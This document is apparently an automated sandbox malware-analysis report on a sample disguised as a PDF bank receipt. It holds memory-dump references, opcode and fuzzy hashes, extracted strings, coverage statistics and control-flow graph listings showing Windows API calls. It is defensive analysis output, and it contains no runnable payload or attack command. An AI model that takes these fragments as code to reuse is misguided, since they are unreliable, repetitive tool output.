                                                                                                                                                          • Instruction ID: 6d2c24d0e298f33d0916724e95496677bcc6315b5ceae620e36969d8ef3a44cc
                                                                                                                                                          • Opcode Fuzzy Hash: ecaa1e4cd15f1c10f2a64ffcca16716f33a6f5d6d380dd763a28ac34ed2dad8f
                                                                                                                                                          • Instruction Fuzzy Hash: 52D1BE74E01218CFDB54DFA9C984B9DBBB2FF89300F1085A9D409AB368DB359985CF51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 55224b9d1c9c39f4f6e67f5c45ae3e4d594c9b096bf1525a0cdf18e4902bb1d2
                                                                                                                                                          • Instruction ID: 7763f72cc9d317378dc1fca7a93ffe5e9e6170ecd4bcd681aaf7f648ee3ecce6
                                                                                                                                                          • Opcode Fuzzy Hash: 55224b9d1c9c39f4f6e67f5c45ae3e4d594c9b096bf1525a0cdf18e4902bb1d2
                                                                                                                                                          • Instruction Fuzzy Hash: A4D1BE74E00218CFDB55DFA9D984B9DBBB2FF89300F1085A9D409AB368DB319A85CF51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8a4068268247b01f2317c03547adbca3226dfca166af6bff96097462c43f376c
                                                                                                                                                          • Instruction ID: 002a41451a2ef8ebecb66b79dd04e35ed6933d03a7f1c17871a7533b99c110d9
                                                                                                                                                          • Opcode Fuzzy Hash: 8a4068268247b01f2317c03547adbca3226dfca166af6bff96097462c43f376c
                                                                                                                                                          • Instruction Fuzzy Hash: 16D1AC74E01218CFDB54DFA9C984B9DBBB2FF89300F1084A9D419AB368DB319A85CF51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 128b5ab6dd81364711cec17a347ef70e29d8f3812cf48198886fa437c94092ad
                                                                                                                                                          • Instruction ID: 9c4cd94c9b5e99427894b0b22e81c87453865c13a4815659e2b622b07ccdf201
                                                                                                                                                          • Opcode Fuzzy Hash: 128b5ab6dd81364711cec17a347ef70e29d8f3812cf48198886fa437c94092ad
                                                                                                                                                          • Instruction Fuzzy Hash: 77D1B074E01218CFDB54DFA9C994B9DBBB2FF89300F1084A9D409AB368DB359985CF51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2dbab09e7bff3389694338769595bd5ea2b422e0a816c210b8665b2cd2ee6a54
                                                                                                                                                          • Instruction ID: 1ef22913a0272e613239b784e9592d1137fbeaa91a32caf6130894d626d5e242
                                                                                                                                                          • Opcode Fuzzy Hash: 2dbab09e7bff3389694338769595bd5ea2b422e0a816c210b8665b2cd2ee6a54
                                                                                                                                                          • Instruction Fuzzy Hash: DBD1AE74E01218CFDB54DFA9C984B9DBBB2FF89300F1084A9D409AB368DB319A85CF51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 969f3f48c073017f4730ed9c3b0aa1fe4f42cb73daa29d6712baedd19303325a
                                                                                                                                                          • Instruction ID: f28d2a834ab5a69558a599d6574fdd412570f1d40d4864c3f5a03f4c1762c627
                                                                                                                                                          • Opcode Fuzzy Hash: 969f3f48c073017f4730ed9c3b0aa1fe4f42cb73daa29d6712baedd19303325a
                                                                                                                                                          • Instruction Fuzzy Hash: 72D1BF74E01218CFDB55DFA9D984B9DBBB2FF89300F1084A9D409AB368DB319985CF51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5d2d6e3e4e756750c23068d8824f6e5702c2ec44f0b8f4987d19a1512e2e2af5
                                                                                                                                                          • Instruction ID: da2f182dcebb5168e03147a1a1fb60dd6758d1bee3cec23c67400c969e73215b
                                                                                                                                                          • Opcode Fuzzy Hash: 5d2d6e3e4e756750c23068d8824f6e5702c2ec44f0b8f4987d19a1512e2e2af5
                                                                                                                                                          • Instruction Fuzzy Hash: 1CD1AE74E01218CFDB54DFA9D984B9DBBB2FF89300F1084A9D409AB368DB359985CF51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a2eb14469b5e94802ea70375cdf2fa1e294a60b3d18230ce1d999da5ada3f20e
                                                                                                                                                          • Instruction ID: a71b49d88cc178dc9fb7cb4c741247f2ce962ed39b9bd9730e644a3c20ad0a8e
                                                                                                                                                          • Opcode Fuzzy Hash: a2eb14469b5e94802ea70375cdf2fa1e294a60b3d18230ce1d999da5ada3f20e
                                                                                                                                                          • Instruction Fuzzy Hash: FDD1BE74E01218CFDB54DFA9D984B9DBBB2FF89300F1085A9D409AB368DB319A85CF51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9be72acd01ae9b88ff17264cefc55db1da33c2cc0b0fcbe7647a8b29446eee06
                                                                                                                                                          • Instruction ID: 10f6d349529a16497e383070672bd7d445225be491d03f34f2cccce4f8046e6d
                                                                                                                                                          • Opcode Fuzzy Hash: 9be72acd01ae9b88ff17264cefc55db1da33c2cc0b0fcbe7647a8b29446eee06
                                                                                                                                                          • Instruction Fuzzy Hash: D0C1BF74E01218CFDB54DFA9C984BADBBB2FF89300F1081A9D409AB364DB359A85CF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ed2d1e4fcb073dc2930373bf161d2a5a612996b1079d2920ec9a08b484a3a0c9
                                                                                                                                                          • Instruction ID: 9fd753104f52823fc5676ee934fa0dfd77269c664e8a14989c6a2b924828e5f0
                                                                                                                                                          • Opcode Fuzzy Hash: ed2d1e4fcb073dc2930373bf161d2a5a612996b1079d2920ec9a08b484a3a0c9
                                                                                                                                                          • Instruction Fuzzy Hash: 53C1B074E01218CFDB54DFA9D984BADBBB2FF89300F1091A9D409AB364DB359A85CF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6902d05945fce0f8e80200607e33ce727235dc8d0609639072f289e509dfce91
                                                                                                                                                          • Instruction ID: ffddf59359347393d0ac16d9b291edcf2410a581f8008419ea4dafc6fb03b0f1
                                                                                                                                                          • Opcode Fuzzy Hash: 6902d05945fce0f8e80200607e33ce727235dc8d0609639072f289e509dfce91
                                                                                                                                                          • Instruction Fuzzy Hash: 15C1A074E01218CFDB54DFA5C984BADBBB2FF89300F1080A9D419AB364DB359A85CF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3412b70d979101031355ab4494648106dcafe5f1c615b9a98d0506a64a6679bf
                                                                                                                                                          • Instruction ID: 88e3854efc3e0a84c672b330d95d33fc8633b288ae1862dca48939310551c2d2
                                                                                                                                                          • Opcode Fuzzy Hash: 3412b70d979101031355ab4494648106dcafe5f1c615b9a98d0506a64a6679bf
                                                                                                                                                          • Instruction Fuzzy Hash: 5DC1A074E01218CFDB54DFA5D984BADBBB2FF89300F1090A9D409AB364DB359A85CF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4e5829b72683c144f23d233b964e0fc69535fe7da2ff926c489e93eea9f4a0b9
                                                                                                                                                          • Instruction ID: 13ca83bf6a7f8bd9a25124775a8142282d9795ca710d6bb86d9ab50212bf0c43
                                                                                                                                                          • Opcode Fuzzy Hash: 4e5829b72683c144f23d233b964e0fc69535fe7da2ff926c489e93eea9f4a0b9
                                                                                                                                                          • Instruction Fuzzy Hash: 87C1AF74E01218CFDB54DFA5D984BADBBB2FF89300F2080A9D419AB364DB359A85CF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 356701225df4b70b8ed17185d5ebdffc171c7d95e40817335eb6bdeab7c7f288
                                                                                                                                                          • Instruction ID: b2965737b44ecb84b38b9dd49310517ed063861df40514ed66907c169a2c5447
                                                                                                                                                          • Opcode Fuzzy Hash: 356701225df4b70b8ed17185d5ebdffc171c7d95e40817335eb6bdeab7c7f288
                                                                                                                                                          • Instruction Fuzzy Hash: F0C1B074E01218CFDB54DFA5D984BADBBB2FF89300F1091A9D409AB364DB359A85CF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 741c1b1ee119a5b66e4d87bc18a7a0b6e2ca7c699d9bed24d48515cfa3ccff3f
                                                                                                                                                          • Instruction ID: d4faf3d43df22e8215186c2a76dab370cdf157e95e885f06b5d3131542f8ecfc
                                                                                                                                                          • Opcode Fuzzy Hash: 741c1b1ee119a5b66e4d87bc18a7a0b6e2ca7c699d9bed24d48515cfa3ccff3f
                                                                                                                                                          • Instruction Fuzzy Hash: 83C1AF74E01218CFDB54DFA9D984BADBBB2FF89300F1090A9D409AB364DB359A85CF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 64ee17c9bde122164f8a7d8ed0d2eb712f263d780a34c21e838e473917fa1d5e
                                                                                                                                                          • Instruction ID: 5c85f3dd96a70955a360b73dcfd26ddfc556ab5a1b8214a6eadf37e223569a9c
                                                                                                                                                          • Opcode Fuzzy Hash: 64ee17c9bde122164f8a7d8ed0d2eb712f263d780a34c21e838e473917fa1d5e
                                                                                                                                                          • Instruction Fuzzy Hash: 1FC1AF74E01218CFDB54DFA9C984BADBBB2FF89300F1090A9D419AB365DB359A85CF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7045b2b59ed35671dbee0384a42eeacf89f12c348d0303ef931520c38e062fc2
                                                                                                                                                          • Instruction ID: 053d1809fb2fc2402c6a02cb54a65b062cf7ec1aa8548f83b84a5f8a4bacff0f
                                                                                                                                                          • Opcode Fuzzy Hash: 7045b2b59ed35671dbee0384a42eeacf89f12c348d0303ef931520c38e062fc2
                                                                                                                                                          • Instruction Fuzzy Hash: 98410174D022098FCB44CFA8C594BEEBBF1AF49300F1485A9E410BB3A1E7788A41CF94
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 61f6f964fbe2c8094110276063f644514382b3c1f5e7c26dae3e9c34dab1695f
                                                                                                                                                          • Instruction ID: 2cabd516dbf83535fa6f053bd483f25dd5e6c02dc7c3db903d13b16a32a718a4
                                                                                                                                                          • Opcode Fuzzy Hash: 61f6f964fbe2c8094110276063f644514382b3c1f5e7c26dae3e9c34dab1695f
                                                                                                                                                          • Instruction Fuzzy Hash: 4641BFB4D022199FCB44DFA8D594BEEBBF1AF49300F1454A9E414B73A1E7789A40CF94
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: \;kq$\;kq$\;kq$\;kq
                                                                                                                                                          • API String ID: 0-2874455797
                                                                                                                                                          • Opcode ID: 8ca419e1785e8822135d97a919b225b582b976effba2def3d5f192114195a9a3
                                                                                                                                                          • Instruction ID: f4e746891834a0d145ceb2251674b20111b44cd6dea9873340919053611d95a5
                                                                                                                                                          • Opcode Fuzzy Hash: 8ca419e1785e8822135d97a919b225b582b976effba2def3d5f192114195a9a3
                                                                                                                                                          • Instruction Fuzzy Hash: 8E01DB317402048FCB248E2CC550AA733EABFD8768736507AE505EB3B8DA39EC418780

Execution Graph

Execution Coverage: 13.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 254
Total number of Limit Nodes: 10

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 573 8920b61-8920b93 575 8920b95 573->575 576 8920b9a-8920c40 573->576 575->576 583 8920c41 576->583 584 8920c48-8920c64 583->584 585 8920c66 584->585 586 8920c6d-8920c6e 584->586 585->583 585->586 587 8920c73-8920ca9 585->587 588 8920d60-8920dd0 585->588 589 8920d16-8920d1c 585->589 590 8920cf5-8920d11 585->590 591 8920d3b-8920d5b 585->591 592 8920cab-8920caf 585->592 593 8920cdb-8920cf0 585->593 586->588 587->584 607 8920dd2 call 8921c90 588->607 608 8920dd2 call 8921d50 588->608 609 8920dd2 call 8922940 588->609 610 8920dd2 call 8921dc1 588->610 611 8920dd2 call 8921dd4 588->611 612 8920dd2 call 8922958 588->612 613 8920dd2 call 8921c8f 588->613 605 8920d1e call 89212d8 589->605 606 8920d1e call 89212c9 589->606 590->584 591->584 594 8920cc2-8920cc9 592->594 595 8920cb1-8920cc0 592->595 593->584 600 8920cd0-8920cd6 594->600 595->600 597 8920d24-8920d36 597->584 600->584 604 8920dd8-8920de2 605->597 606->597 607->604 608->604 609->604 610->604 611->604 612->604 613->604
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tekq$Tekq
                                                                                                                                                          • API String ID: 0-2269808460
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tekq$Tekq
                                                                                                                                                          • API String ID: 0-2269808460
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: \~$$or
                                                                                                                                                          • API String ID: 0-2796768027
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: \~$$or
                                                                                                                                                          • API String ID: 0-2796768027
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ?w=>
                                                                                                                                                          • API String ID: 0-1933253675
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ?w=>
                                                                                                                                                          • API String ID: 0-1933253675
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: j4$y
                                                                                                                                                          • API String ID: 0-2391584009
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: j4$y
                                                                                                                                                          • API String ID: 0-2391584009

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 333 58636d8-5863777 GetCurrentProcess 337 5863780-58637b4 GetCurrentThread 333->337 338 5863779-586377f 333->338 339 58637b6-58637bc 337->339 340 58637bd-58637f1 GetCurrentProcess 337->340 338->337 339->340 342 58637f3-58637f9 340->342 343 58637fa-5863815 call 58638c2 340->343 342->343 346 586381b-586384a GetCurrentThreadId 343->346 347 5863853-58638b5 346->347 348 586384c-5863852 346->348 348->347
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 05863766
                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 058637A3
                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 058637E0
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 05863839
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                          • Opcode ID: 45aa9eea824eef287312712219b199396f82ba8f45df6753ff1a85bc4d1b791d
                                                                                                                                                          • Instruction ID: 52778a37be1b1257890470a9db404ac4e31b390fedec969d5904cc708aa2c32c
                                                                                                                                                          • Opcode Fuzzy Hash: 45aa9eea824eef287312712219b199396f82ba8f45df6753ff1a85bc4d1b791d
                                                                                                                                                          • Instruction Fuzzy Hash: 125163B09003498FDB14DFA9D948B9EBFF1FF48314F248469D849A7260DB34A984CF66

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 355 58636e8-5863777 GetCurrentProcess 359 5863780-58637b4 GetCurrentThread 355->359 360 5863779-586377f 355->360 361 58637b6-58637bc 359->361 362 58637bd-58637f1 GetCurrentProcess 359->362 360->359 361->362 364 58637f3-58637f9 362->364 365 58637fa-5863815 call 58638c2 362->365 364->365 368 586381b-586384a GetCurrentThreadId 365->368 369 5863853-58638b5 368->369 370 586384c-5863852 368->370 370->369
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 05863766
                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 058637A3
                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 058637E0
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 05863839
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                          • Opcode ID: 03cb048bfd7dde98efa9d89aadef41efce4b09148b7f9e827e782250a1a5fc68
                                                                                                                                                          • Instruction ID: 2d37ecccce3214175580399e98be233f5ea7f262be58bf3bbc3857b981d72b97
                                                                                                                                                          • Opcode Fuzzy Hash: 03cb048bfd7dde98efa9d89aadef41efce4b09148b7f9e827e782250a1a5fc68
                                                                                                                                                          • Instruction Fuzzy Hash: DA5145B09007098FDB54DFAAD548B9EBBF1FF88314F248469D419A7360DB34A984CF66

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 683 892af60-892af83 684 892af85 683->684 685 892af8a-892b0a0 683->685 684->685 715 892b0a3 call 892b160 685->715 716 892b0a3 call 892b15c 685->716 691 892b0a9-892b0b0 725 892afdf call 892b750 691->725 726 892afdf call 892b760 691->726 697 892afe5-892b064 699 892b144-892b14a 697->699 701 892afc7-892afcb 699->701 702 892b0c1-892b131 701->702 703 892afd1-892b0b6 701->703 717 892b133 call 892bfc0 702->717 718 892b133 call 892c477 702->718 719 892b133 call 892c21b 702->719 720 892b133 call 892bd98 702->720 721 892b133 call 892bda8 702->721 722 892b133 call 892be8f 702->722 723 892b133 call 892c34f 702->723 724 892b133 call 892c1bc 702->724 703->701 714 892b139-892b143 714->699 715->691 716->691 717->714 718->714 719->714 720->714 721->714 722->714 723->714 724->714 725->697 726->697
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tekq$Tekq
                                                                                                                                                          • API String ID: 0-2269808460
                                                                                                                                                          • Opcode ID: b816242e7b19d6b188899068bb076270f8dbe794a578ab0b8505f65f04d1aa89
                                                                                                                                                          • Instruction ID: 7c71eefbb7b151ecec6f00a28c1c5fb66e4c6ed5db87b473ff919bb1d981a1b6
